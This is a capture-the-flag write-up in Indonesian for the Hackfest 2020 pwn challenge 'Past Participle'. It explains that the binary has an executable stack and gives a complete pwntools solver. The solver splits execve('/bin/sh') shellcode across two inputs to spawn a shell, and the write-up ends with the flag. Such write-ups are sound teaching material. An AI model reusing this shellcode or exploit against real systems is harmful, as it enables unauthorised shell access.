# Past Participle

## Deskripsi

    Who controls the past controls the future.
    Who controls the present controls the past.
    Take control.

## Solusi

binary ini dapat mengeksekusi stack dapat di check dengan menggunakan perintah
`checksec`

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments

terlihat proteksi `nx` disabled artinya kita dapat mengeksekusi instruksi di stack
selanjutnya peserta tinggal mengirim shellcode secara terpisah maximal `20 byte` 
untuk input pertama, `8 byte` maximal untuk input kedua, setelah itu input tersebut
akan di gabungkan dan di `call`, solver:

    #!/usr/bin/env python2
    import sys
    from pwn import *
    context.update(arch="amd64", endian="little", os="linux", log_level="debug",
                terminal=["tmux", "split-window", "-v", "-p 85"],)
    LOCAL, REMOTE = False, False
    TARGET=os.path.realpath("/home/tripoloski/code/ctf/hackfest-2020/quals/pwn/past-participle/a.out")
    elf = ELF(TARGET)

    def attach(r):
        if LOCAL:
            bkps = ['* main+239']
            gdb.attach(r, '\n'.join(["break %s"%(x,) for x in bkps]))
        return

    def exploit(r):
        # attach(r)
        shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
        r.send(shellcode[8:])
        r.send(shellcode[:8])
        r.interactive()
        return

    if __name__ == "__main__":
        if len(sys.argv)==2 and sys.argv[1]=="remote":
            REMOTE = True
            r = remote("127.0.0.1", 1337)
        else:
            LOCAL = True
            r = process([TARGET,])
        exploit(r)
        sys.exit(0)

FLAG: hackfest{y0u_t4ke_c0ntr0ll!!!!}